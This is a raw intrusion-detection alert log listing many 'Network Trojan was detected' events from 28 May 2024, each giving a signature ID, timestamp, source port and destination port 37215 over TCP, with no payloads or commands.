                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911678
                  SID:2835222
                  Source Port:51178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809150
                  SID:2829579
                  Source Port:59062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930376
                  SID:2835222
                  Source Port:34154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796696
                  SID:2829579
                  Source Port:56644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781131
                  SID:2835222
                  Source Port:44900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.295832
                  SID:2835222
                  Source Port:35798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536067
                  SID:2829579
                  Source Port:38460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494420
                  SID:2835222
                  Source Port:46170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.353787
                  SID:2829579
                  Source Port:55526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555665
                  SID:2835222
                  Source Port:54844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719824
                  SID:2829579
                  Source Port:40936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847662
                  SID:2835222
                  Source Port:44340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316533
                  SID:2829579
                  Source Port:44070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.610323
                  SID:2829579
                  Source Port:35864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627950
                  SID:2829579
                  Source Port:38280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.837199
                  SID:2835222
                  Source Port:36572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.585328
                  SID:2829579
                  Source Port:47584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.684239
                  SID:2829579
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543163
                  SID:2829579
                  Source Port:43576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577248
                  SID:2835222
                  Source Port:58906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930174
                  SID:2835222
                  Source Port:52216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577429
                  SID:2829579
                  Source Port:59780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791315
                  SID:2835222
                  Source Port:33032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578051
                  SID:2835222
                  Source Port:38924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627726
                  SID:2829579
                  Source Port:36902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844798
                  SID:2829579
                  Source Port:39086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490398
                  SID:2829579
                  Source Port:47936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529307
                  SID:2829579
                  Source Port:34410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.788885
                  SID:2835222
                  Source Port:39320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316682
                  SID:2829579
                  Source Port:44670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695249
                  SID:2835222
                  Source Port:39294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912188
                  SID:2835222
                  Source Port:57994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586914
                  SID:2829579
                  Source Port:49416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927034
                  SID:2835222
                  Source Port:41240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316413
                  SID:2835222
                  Source Port:42176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587103
                  SID:2835222
                  Source Port:39834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530960
                  SID:2829579
                  Source Port:48768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.591470
                  SID:2835222
                  Source Port:34152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931550
                  SID:2835222
                  Source Port:38534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489396
                  SID:2835222
                  Source Port:38166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719985
                  SID:2829579
                  Source Port:48374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.295998
                  SID:2835222
                  Source Port:55164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886861
                  SID:2829579
                  Source Port:36582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.292778
                  SID:2835222
                  Source Port:52008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.753944
                  SID:2835222
                  Source Port:48598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536099
                  SID:2835222
                  Source Port:41526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276577
                  SID:2829579
                  Source Port:37532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490418
                  SID:2829579
                  Source Port:32852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:09.531251
                  SID:2829579
                  Source Port:47516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.548288
                  SID:2835222
                  Source Port:59552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.678830
                  SID:2829579
                  Source Port:47232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766639
                  SID:2835222
                  Source Port:43494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555586
                  SID:2829579
                  Source Port:52352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664832
                  SID:2829579
                  Source Port:37188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844951
                  SID:2829579
                  Source Port:41748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927192
                  SID:2829579
                  Source Port:33242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.801587
                  SID:2835222
                  Source Port:44834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.809975
                  SID:2835222
                  Source Port:56028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649418
                  SID:2829579
                  Source Port:46418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729788
                  SID:2829579
                  Source Port:46156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660000
                  SID:2829579
                  Source Port:48328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529307
                  SID:2835222
                  Source Port:38762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.290860
                  SID:2835222
                  Source Port:56952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586038
                  SID:2829579
                  Source Port:54528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.593860
                  SID:2835222
                  Source Port:46398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584437
                  SID:2835222
                  Source Port:40200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797271
                  SID:2829579
                  Source Port:48750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912188
                  SID:2835222
                  Source Port:34322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.928351
                  SID:2829579
                  Source Port:41476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536177
                  SID:2835222
                  Source Port:48510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.543463
                  SID:2835222
                  Source Port:41314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.586468
                  SID:2835222
                  Source Port:53422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278870
                  SID:2829579
                  Source Port:55600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843706
                  SID:2829579
                  Source Port:35620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.927172
                  SID:2829579
                  Source Port:57156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798247
                  SID:2829579
                  Source Port:48758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.909408
                  SID:2835222
                  Source Port:52332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768683
                  SID:2829579
                  Source Port:53916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847675
                  SID:2835222
                  Source Port:41330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.494810
                  SID:2835222
                  Source Port:50476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766382
                  SID:2829579
                  Source Port:51996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546751
                  SID:2835222
                  Source Port:40858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719981
                  SID:2835222
                  Source Port:33038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886190
                  SID:2829579
                  Source Port:44608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874980
                  SID:2829579
                  Source Port:45392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.886267
                  SID:2829579
                  Source Port:38298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591073
                  SID:2835222
                  Source Port:41250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298551
                  SID:2835222
                  Source Port:59670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493612
                  SID:2835222
                  Source Port:34740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650288
                  SID:2835222
                  Source Port:46306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488685
                  SID:2829579
                  Source Port:37080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551824
                  SID:2835222
                  Source Port:42012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578658
                  SID:2829579
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767618
                  SID:2835222
                  Source Port:47054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845850
                  SID:2835222
                  Source Port:60360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910394
                  SID:2835222
                  Source Port:41862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737951
                  SID:2835222
                  Source Port:40974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.793554
                  SID:2829579
                  Source Port:51586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.804083
                  SID:2829579
                  Source Port:49920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795007
                  SID:2829579
                  Source Port:45082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278852
                  SID:2835222
                  Source Port:42786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788100
                  SID:2835222
                  Source Port:53300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713743
                  SID:2835222
                  Source Port:56350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719324
                  SID:2835222
                  Source Port:33382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910596
                  SID:2835222
                  Source Port:49994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795154
                  SID:2829579
                  Source Port:40792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278415
                  SID:2829579
                  Source Port:55154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.300247
                  SID:2829579
                  Source Port:33708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.293060
                  SID:2829579
                  Source Port:56698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577339
                  SID:2835222
                  Source Port:50102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.927471
                  SID:2835222
                  Source Port:50740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788845
                  SID:2829579
                  Source Port:50732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.794768
                  SID:2829579
                  Source Port:36804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488150
                  SID:2835222
                  Source Port:39102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577820
                  SID:2835222
                  Source Port:34344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795418
                  SID:2829579
                  Source Port:60960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.323165
                  SID:2835222
                  Source Port:58924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536177
                  SID:2835222
                  Source Port:41980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594369
                  SID:2829579
                  Source Port:33094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.737535
                  SID:2829579
                  Source Port:50212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586119
                  SID:2829579
                  Source Port:41008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765947
                  SID:2835222
                  Source Port:44324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.930712
                  SID:2835222
                  Source Port:52234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908021
                  SID:2835222
                  Source Port:54016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750222
                  SID:2829579
                  Source Port:41520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555686
                  SID:2829579
                  Source Port:37016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664553
                  SID:2835222
                  Source Port:51012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656247
                  SID:2829579
                  Source Port:36014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888259
                  SID:2829579
                  Source Port:59934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.579003
                  SID:2835222
                  Source Port:54678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578564
                  SID:2829579
                  Source Port:33450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769332
                  SID:2835222
                  Source Port:45964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843622
                  SID:2829579
                  Source Port:33148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750011
                  SID:2829579
                  Source Port:59292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319102
                  SID:2829579
                  Source Port:50742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.904683
                  SID:2835222
                  Source Port:36396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888032
                  SID:2829579
                  Source Port:59866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649380
                  SID:2829579
                  Source Port:34286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537491
                  SID:2835222
                  Source Port:47080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278006
                  SID:2829579
                  Source Port:52908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.493133
                  SID:2829579
                  Source Port:58990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319402
                  SID:2835222
                  Source Port:37846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695696
                  SID:2835222
                  Source Port:33774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.755631
                  SID:2829579
                  Source Port:37984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.888575
                  SID:2829579
                  Source Port:35980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.797347
                  SID:2829579
                  Source Port:50904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312563
                  SID:2829579
                  Source Port:47422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.750019
                  SID:2835222
                  Source Port:34258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910975
                  SID:2829579
                  Source Port:55556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.492103
                  SID:2829579
                  Source Port:40624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591043
                  SID:2835222
                  Source Port:58382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910199
                  SID:2835222
                  Source Port:49198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316510
                  SID:2829579
                  Source Port:54176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.682847
                  SID:2835222
                  Source Port:45028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.920365
                  SID:2829579
                  Source Port:43008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906675
                  SID:2835222
                  Source Port:37116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.810453
                  SID:2835222
                  Source Port:36140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656536
                  SID:2835222
                  Source Port:43746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278850
                  SID:2835222
                  Source Port:34242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911177
                  SID:2835222
                  Source Port:57254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796825
                  SID:2829579
                  Source Port:46702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911213
                  SID:2829579
                  Source Port:47604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.655677
                  SID:2829579
                  Source Port:60186
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529824
                  SID:2835222
                  Source Port:38960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781131
                  SID:2829579
                  Source Port:44900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.544374
                  SID:2829579
                  Source Port:40064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.537030
                  SID:2835222
                  Source Port:43136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910965
                  SID:2835222
                  Source Port:53002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908546
                  SID:2829579
                  Source Port:53474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745936
                  SID:2835222
                  Source Port:59442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912541
                  SID:2829579
                  Source Port:37360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577101
                  SID:2829579
                  Source Port:53568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.555319
                  SID:2829579
                  Source Port:51504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.673611
                  SID:2829579
                  Source Port:59150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536246
                  SID:2835222
                  Source Port:58820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316533
                  SID:2835222
                  Source Port:44070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768730
                  SID:2829579
                  Source Port:53388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.278245
                  SID:2835222
                  Source Port:44740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.652051
                  SID:2829579
                  Source Port:55972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930519
                  SID:2835222
                  Source Port:50878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542657
                  SID:2829579
                  Source Port:55640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795154
                  SID:2835222
                  Source Port:35230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651414
                  SID:2829579
                  Source Port:53288
                  Destination Port:37215
